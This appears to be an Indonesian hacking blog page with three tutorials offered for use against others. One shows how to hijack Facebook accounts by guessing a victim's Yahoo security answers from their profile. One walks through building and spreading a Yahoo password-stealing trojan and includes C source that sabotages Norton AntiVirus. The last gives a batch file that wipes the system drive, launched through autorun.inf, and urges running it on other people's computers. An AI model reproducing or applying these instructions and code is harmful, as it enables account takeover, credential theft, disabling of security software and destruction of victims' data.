TAKEOVER FACEBOOK DENGAN TEKNIK SOCIAL ENGINEERING

sebelumnya social engineering sebagai teknik dan seni mendapatkan informasi dari personal
dengan cara mengelabui tanpa perlu melakukan hal-hal yang biasa dilakukan seorang cracker. Ada pula
yang mengatakan sebagai psychological tricks terhadap orang yang memiliki hak akses pada suatu sistem
sebagai upaya untuk mengambil informasi yang dibutuhkan. Atau bisa dianggap sebagai seni
memanfaatkan kelemahan-kelemahan manusia seperti sikap tak acuh, naif atau keinginan natural manusia
yang ingin disukai orang lain.

daripada bengong saia coba menuliskan bagaimana take0ver facebook dengan memanfaatkan kelemahan user
lalu bagaimana caranya Tuan Muda????heee..sering dapat pertanyaan gitu saia.,baiklah.,.,.m0ga sajja dengan tulisan ini bisa terjawab.AMIN

yang pertama cari email target..usahakan yahoo dech..hihihi

lalu masuk ke yahoo truz klik I can't acces my account atau saya tidak dapat mengakses email saya
truz akan muncul pilihan masalah apa yang anda hadapi..yuhu.,.yahoo munk baik bgd yak.,.^_^

klik next sajjah lach.,lalu diminta memasukan email alternatif.,.wew.,.biLang az ga punya,,heee
s0 pilih yang bawah atau saia tidak dapat mengakses email alternatif saia juga.,hahahaha
nach..masukan email target tadi lalu masukan juga scurity c0dex..truz next lg...

wew,,,hehehee..ujian dimulai...ay0 jawab pertanyaan scurity dari target kita..hahay,,
ada bermacam pertanyaan yang di tawarkan yahoo..
apabila user menggunakan pertanyaan default dari yahoo maka hal ini bisa memudahkan kita dalam memasuki paksa emailx.,.
biasanya pertanyaan yang muncul
1. dimanakah anda berbulan madu???
berdasarkan hasiL survey & pengalaman rata-rata user menjawab
bali
lombok
jepang
venezuela
rumah
dirumah
dan lain-lain.,.hihihi...kal0 tetap gagaL bisa cek kota asal target kita di inf0 facebookx..coba az dimasukan biasanya berhasiL
2. tanggal lahir & k0de pos..???
ini lebih gampang lagi karena biasanya di inf0 facebookx user juga membiarkan tanggal lahir terlihat begitu sajja..heee
*lalu kede posx Tuan?????
itu bisa di atasi...buka az situs pos ind0nesia..hahahahhaaa.,.masukan kota target kL0 ada alamat rumahx.,.lebih gampang lg..hikz.,.nanti dikasih tw sm pak p0s onlinex
3. siapa nama belakang paman kesayangan anda???
mmmmmmmm,,,,yang ini kita mesti kerja ekstra chuy.,.hikz.,.coba az dekati target.,.lalu nanya-nanya gt dech.,.yg ujung2x mengarah pd pertanyaan yang kita butuhkan.,
4. apa nama hewan peliharaan anda???
coba buka f0to-ft0 target..kL0 munk dy jujur.,.biasax ada f0to binatang kesayanganx tuch.,.hihihi.,.tinggal cek2 sajjah......
5. apa nama sekolah dan lain..lain....

intinya kreative lach kita menjawab ujian yang di berikan yahoo tersebuk.,.ckckckck

anggap kita suda berhasil menjawab pertanyaan pertama dari yahoo scurity team.,.hahay.,.

akan ada pertanyaan ke dua.,.yang biasanya lebih gampang lagi.,.hihii

antara lain yang sering keluar
apanama merek motor / mobil pertama anda??
siapa nama pengarang favorit anda??
music fav0rit anda??
dimana anda bertemu pasangan anda?
dan lain sebagaix,.,

setelah berhasil melewati ujian kita akan diminta untuk memasukan password baru.,.

pada dasarnya smwa jawaban itu ada pada inf0 yang di berikan user di akun facebookx..


jadi kesimpulannya....email adalah kunci...kita & kelemahan user sering menganggap email hal yang gampang & menyepelekanx...
bahkan ada user yang tidak pernah sama sekali membuka emailx.,.jd y...pnya email cM buat bikin akun fabook sajjah .titik..
wew,,,parah........
orang-orang bginiLah yang biasanya menjadi k0rban.,.ckckckk
kl0 email korban sudah di tangan kita y...tinggal forgot password az kn di facebook...berezzz,,,


s0 jangan pernah menganggap sepeLe masaLah emaiL..^_^

Selasa, 22 Juni 2010

++Bermain dengan Trojan++


kita main-main dengan trojan hhyuuukkkk ;) Trojannya nanti
kita kasih tugas untuk mendapatkan Yahoo account berupa username + passwordnya.
Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan
versi Yahoo Messenger. Trojannya kita buat dengan trojan generator kemudian
kita binding (editor: binding <-> mengikat) dengan aplikasi pem-binding. Nanti
hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email,
kirim langsung melalui YM atau dengan cara membuang (?) CD ditempat tertentu.

---// Bagaimana caranya?

------[ Persiapan

- Magic-PS Trojan Generator.
Bisa Anda download disini : http://magic.shabgard.org/Magic-PS-15se++.zip
- File Binder. Anda bisa memanfaatkan file binder apapun.
- C Compiler

------[Target Trojan

- User yang mempergunakan windows (-- yg pake linux aman bro ;)
- User yang masih bisa kena 'social engineering' (bro.. terserah gimana
caranya deh.. biar tuh user bisa mati'in Antivirusnya....)
Kalo dia ga mau mati'in ya udah. Nanti kita matikan secara paksa
dengan coding tertentu (editor: jangan maen clurit ya? ;) ).

------[Pembuatan Trojan

- Matikan semua Antivirus yang berada di komputer Anda
(--hhikkzzz.. kalo ga dimatikan bakalan ga' bisa bikin trojan).
- Buatlah sebuah folder untuk menempatkan hasil trojan.
- Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah
trojan generator tersebut.

Nanti tampilannya seperti ini :


+--------------------------------------------------+
| Magic-PS-15se |
+--------------------------------------------------+
| Victim |
| |
| [v] Send Y! Mess Pass [ ] Send OS Name |
| [ ] Send IP [v] Auto Startup |
| [ ] Send Computer Name [ ] Send win UserName |
| [ ] Disable taslmgr XP-2k [ ] Disable RegEdit |
| [v] Disbale Y! save pass [ ] Disable MsConfig |
| [V] Delete Mess Archive [ ] Melt After Install |
| [ ] Encode Pass +---------------------+ |
| FileName After Install | regsvr.exe | |
| +---------------------+ |
| [ ] Fake Error Message |
| +----------------------+ |
| Caption | | +-------+ |
| +----------------------+ | | |
| +----------------------+ | Test | |
| Message | | +-------+ |
| +----------------------+ |
| Your Yahoo! ID that logged pass send to it |
| +----------------------+ |
| Y! ID | | |
| +----------------------+ |
| Just type ID don't use @yahoo.com Ex: john_26 |
| [ ] Binder +------------+ +--------+ |
| [..] Extract to |TempDir | Run |Normal | |
| +------------+ +--------+ |
| Choose icon (only for .exe and .scr) |
| ( ) No icon ( ) JPG icon ( ) Setup icon |
| ( ) Zip icon ( ) RAR icon ( ) Love icon |
| ( ) Flash icon1 ( ) Flash icon2 ( ) Flash icon3 |
| ( ) Paint icon ( ) PDF icon ( ) Transparent |
| MPS Creator |
| +---------------+ |
| FileName |Sender.exe | |
| +---------------+ |
+--------------------------------------------------+
| Create MPS | DeCoder | About | Exit |
+--------------------------------------------------+

Keterangan Trojan :
[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada
trojan yang Anda inginkan, misalkan saja mengambil IP Address si
target.
[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut
akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa
memilih file penyamaran lainnya.
[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account
ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut
tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan
memberikan account + password si target ke email tersebut!
[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.
[05] FileName, ini merupakan file trojan hasil generator. File inilah yang
nantinya Anda kirim ke target yang menjadi sasaran kita ;)
[06] Create MPS merupakan tombol yang men-generate trojan.


------[ Penyiapan Routin Pembunuh NAV :

Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk
membunuh NAV secara paksa. Routine ini dibuat oleh teman saya : Magic_h2001
(Hai 'Magic_h2001'... thx for ur code).

//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/

#include
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\micr*soft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}


* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.
//--- code ----//


------[ Proses Penyerangan
-
Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki
2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.

Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang
terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Ini agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah
proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target
yang dituju. Terserah, dengan metode apapun sekali lagi, jangan
pakai clurit yah BigGrin.gif

प्रोग्राम Perusak....


Berani Taruhan…
Klo berani silahkan lanjutin dech…
Klo g’… stop sampe disini aja ya…

Game’snya gampang…
Isi formulir berikut
Nama : …
Email : …
Tingakat Keberanian : … (easy/normal/hard)
(canda bos)

Gini caranya…
Klik start trus klik run didalamnya ketikkan notepad atau cara laen asalkan notepad kamu kebuka…

Trus ketikan

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Atau copy aja trus pastekan perintah diatas kedalam notepad kamu…
bisa juga pakai perintah ini

@echo off
shutdown -r -f -t 00

Simpan dengan ekstensi .bat, contoh progam perusak.bat
Trus gunain jimat autorun.inf untuk menjalankan program tersebut

Caranya buatnya buka lagi notepadnya… Trus ketikan

[autorun]
open=program perusak.bat

Kali ini simpan dengan nama autorun.inf

Selesai dech…

Catatan :
1. Penulis tidak bertanggung jawab terhadap efek yang ditimbulkan, resiko ditanggung praktikum
2. Bagi yang pernah memuat tulisan tentang program ini mohon maaf bos… bukan maksud meniru saya dapet dari temen juga
3. Artikel ini brengsek bangetz (nikmati aja sendiri jangan disebarkan)

Saran :
1. BackUp data sebelum praktek
2. Prakteklah saat kamu lagi santai, banyak waktu kosong, sehingga kamu punya banyak waktu untuk install ulang
3. (ini yang paling penting) Jangan melakukan praktek dikomputer sendiri prakteklah dikomputer orang lain
4. Hati-hati